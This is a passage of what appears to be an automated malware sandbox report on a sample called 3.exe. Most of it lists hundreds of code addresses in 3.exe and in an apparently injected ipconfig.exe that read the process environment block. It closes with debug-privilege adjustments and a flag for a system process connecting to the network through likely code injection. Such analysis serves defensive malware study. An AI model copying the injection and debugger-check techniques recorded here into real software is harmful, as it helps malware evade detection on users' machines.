          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
